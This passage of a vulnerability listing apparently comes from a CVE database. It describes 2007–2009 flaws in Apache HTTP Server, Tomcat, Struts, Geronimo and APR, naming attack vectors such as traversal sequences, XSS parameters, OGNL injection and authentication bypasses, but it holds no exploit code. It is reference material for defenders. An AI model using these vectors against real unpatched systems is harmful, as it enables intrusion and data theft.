13523| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
13524| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13525| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
13526| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
13527| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
13528| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
13529| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
13530| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
13531| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
13532| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
13533| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
13534| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
13535| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
13536| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
13537| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
13538| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
13539| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
13540| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
13541| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
13542| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
13543| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
13544| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
13545| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
13546| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
13547| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
13548| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
13549| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
13550| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
13551| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
13552| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
13553| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
13554| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
13555| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
13556| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
13557| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
13558| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
13559| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
13560| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
13561| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
13562| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
13563| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
13564| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
13565| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
13566| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
13567| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
13568| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
13569| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
13570| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
13571| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
13572| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
13573| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
13574| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
13575| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
13576| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
13577| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
13578| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
13579| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
13580| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
13581| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
13582| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
13583| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
13584| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
13585| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
13586| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
13587| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
13588| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
13589| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
13590| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
13591| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
13592| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
13593| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
13594| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
13595| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
13596| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
13597| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13598| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13599| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
13600| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
13601| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
13602| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
13603| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
13604| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
13605| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
13606| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
13607| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
13608| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
13609| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13610| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13611| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
13612| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
13613| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
13614| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13615| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
13616| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
13617| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
13618| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
13619| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
13620| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
13621| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
13622| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
13623| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13624| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
13625| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
13626| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
13627| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
13628| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
